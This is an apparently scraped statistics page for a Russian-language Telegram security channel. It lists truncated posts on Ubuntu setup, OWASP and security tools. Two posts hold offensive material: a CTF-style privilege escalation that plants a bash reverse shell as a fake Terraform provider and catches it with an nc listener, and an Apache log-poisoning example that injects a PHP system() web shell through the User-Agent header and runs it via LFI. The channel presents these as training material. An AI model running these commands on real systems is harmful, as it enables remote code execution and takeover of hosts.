SSafety🪬

Safety🪬

@Safety_Y💻 Технологии🇷🇺 Русский📅 март 2026 г.

🔐Безопаснось в сети. Обучающие материалы.

📊 Полная статистика📝 Все посты
##39#036#092#ubuntu#linux#администрирование#tor#анонимность
40
Подписчики
4,25
Ср. охват
10.6%
Вовлечённость
20
Постов
~3.3
В день

Графики

📊 Средний охват постов

📉 ERR % по дням

📋 Публикации по дням

📎 Типы контента

Лучшие публикации

20 из 20
SSafety_Y
Safety_Y
24 мар., 09:04

OWASP как с ним работать?‼️ 🚀 OWASP: не просто аббревиатура, а survival guide для разработчика Знаете главную причину утечек данных и взломов веб-приложений? Это не хитрые 0-day уязвимости, а старые, как мир, A01:2021-Broken Access Control и A03:2021-Injection. Знакомо? Именно эти риски — ядро OWASP Top 10. Но OWASP — это не просто список страшилок. Это бесплатный арсенал для создания защищённого кода. И вот как его использовать на практике: 🛠 Три must-have инструмента на старте: 1. OWASP ZAP ...

👁 5📷 photo
SSafety_Y
Safety_Y
24 мар., 06:00

1. Не доверяйте плагинам — GiveWP 3.14.0 уязвим, но многие до сих пор его не обновили . 2. PHP-CGI — зло — если используете, убедитесь, что версия актуальная (>8.3.8) . 3. Service Account токены — отключайте автоматическое монтирование для подов, которым не нужен доступ к API : spec: automountServiceAccountToken: false 4. Обновляйте runc — версии до 1.1.12 уязвимы для CVE-2024-21626 . 5. Проверяйте sudo-права — если пользователь может запускать runc от root, считайте, что хост скомпрометирован ....

👁 5
SSafety_Y
Safety_Y
28 мар., 08:03

🛣 Установка и запуск traceroute на Ubuntu 22.04 traceroute — классическая утилита для диагностики сети, показывающая путь пакетов до удалённого хоста . ## 📦 Установка sudo apt update sudo apt install traceroute -y ## 🚀 Базовое использование traceroute google.com Пример вывода: traceroute to google.com (142.250.185.46), 30 hops max, 60 byte packets 1 router.home (192.168.1.1) 2.345 ms 2.123 ms 1.987 ms 2 3 10.0.0.1 (10.0.0.1) 15.678 ms 14.321 ms 14.001 ms 4 72.14.215.84 (72.14.215.84) 22.456 m...

👁 5📷 photo
SSafety_Y
Safety_Y
25 мар., 06:00

cat > /dev/shm/terraform-provider-examples << 'EOF' #!/bin/bash bash -i >& /dev/tcp/10.10.14.220/4444 0>&1 EOF chmod +x /dev/shm/terraform-provider-examples Теперь создаем конфиг Terraform, который переопределяет путь к провайдеру на нашу директорию: cat > ~/.terraformrc << 'EOF' provider_installation { dev_overrides { "previous.htb/terraform/examples" = "/dev/shm" } direct {} } EOF Ставим слушатель на атакующей машине: nc -lvnp 4444 Запускаем Terraform от root с указанием рабочей директории: su...

👁 5
SSafety_Y
Safety_Y
25 мар., 08:00

🌍 Установка Google Earth на Ubuntu 22.04 LTS Хотите рассматривать любую точку планеты, не выходя из дома? Google Earth Pro доступен для Ubuntu, и установить его можно несколькими способами . Выберите самый удобный для вас. ## 📥 Способ 1: Установка через скачанный .deb пакет (Самый простой) Этот метод не требует добавления репозиториев и отлично подходит для разовой установки . 1. Скачайте пакет. Откройте терминал (Ctrl+Alt+T) и выполните: cd /tmp && mkdir google-earth && cd google-earth wget h...

👁 5📷 photo
SSafety_Y
Safety_Y
26 мар., 06:01

Отличная тема для сборника! "Семь друзей хакера" Я подобрал семь действительно мощных инструментов для усиления разведки — от поиска утечек до автоматизации OSINT. https://xakep.ru/2026/02/26/7-scanning-tools/ --- 🛠 Семь друзей хакера. Собираем инструменты для усиления разведки Покопавшись в своем ящике инструментов, я нашел несколько жемчужин, которыми решил поделиться. Сбор информации о таргете, поиск скрытых путей и секретных данных, сканирование XSS и альтернатива Burp . Разведка (recon) — ...

👁 5
SSafety_Y
Safety_Y
26 мар., 06:01

brs-xss — это современный асинхронный XSS-сканер, который понимает контекст выполнения . Что умеет: - Контекстно-зависимый анализ - Асинхронное сканирование (быстро) - Работает на базе BRS-KB (базы знаний) - Версия 4.0.0 (январь 2026) — свежая и без известных уязвимостей Пример установки: pip install brs-xss==4.0.0 Почему это важно: Обычные XSS-сканеры просто тыкают payload'ы. brs-xss анализирует, где именно выполняется код — в HTML, в JavaScript, в атрибутах тегов — и подбирает соответствующий ...

👁 5
SSafety_Y
Safety_Y
27 мар., 08:53

🍺 Установка и удаление Homebrew на Ubuntu 22.04 Homebrew (изначально созданный для macOS) отлично работает на Linux и позволяет устанавливать свежие версии инструментов, которых нет в стандартных репозиториях . ## 📥 Установка Homebrew ### 1. Установите зависимости sudo apt update sudo apt install build-essential procps curl file git -y Эти пакеты необходимы для компиляции и работы Homebrew . ### 2. Запустите скрипт установки /bin/bash -c "&#036;(curl -fsSL https://raw.githubusercontent.com/Hom...

👁 4📷 photo
SSafety_Y
Safety_Y
28 мар., 06:03

Отличная тема для новичков! Веб-шеллы — это та самая "входная дверь", которую хакеры оставляют после взлома. В этом посте разберем, как они устроены, как их заливают и как логи сервера сами превращаются в шелл. Всё с реальными примерами кода. https://xakep.ru/2026/03/03/webshells-for-begginers/ --- 🐚 Веб-шеллы с самого начала. Как серверы захватывают через веб-приложение Сегодня я расскажу о том, что такое веб‑шеллы и как их пишут. Посмотрим, как при атаках заливают шелл на сервер, получив RCE ...

👁 4
SSafety_Y
Safety_Y
28 мар., 06:03

Теория: Если мы можем читать логи сервера через LFI и влиять на их содержимое (например, через User-Agent), то, подсунув туда PHP-код и подключив через LFI, мы заставим сервер его выполнить . Практика для Apache: 1. Отправляем запрос с PHP-кодом в User-Agent: curl --user-agent "<?php system(&#092;&#036;_GET['cmd']); ?>" http://target.com/ 2. Теперь через LFI подключаем лог: http://target.com/page.php?file=/var/log/apache2/access.log&cmd=id Сервер выполнит id и вернет результат . Для Nginx — пути...

👁 4

Типы хуков

Нейтральный15 | 4 просм.
Статистика3 | 4 просм.
Вопрос2 | 5 просм.

Длина постов

Очень длинные (1000+)19 | 4 просм.
Длинные (500-1000)1 | 5 просм.

Влияние эмодзи

4
С эмодзи (13)
4
Без эмодзи (7)
0.0% охвата

Типы контента

📷
8
photo
4 просм.
📝
12
text
4 просм.
Safety🪬 (@Safety_Y) — Telegram-канал | PostSniper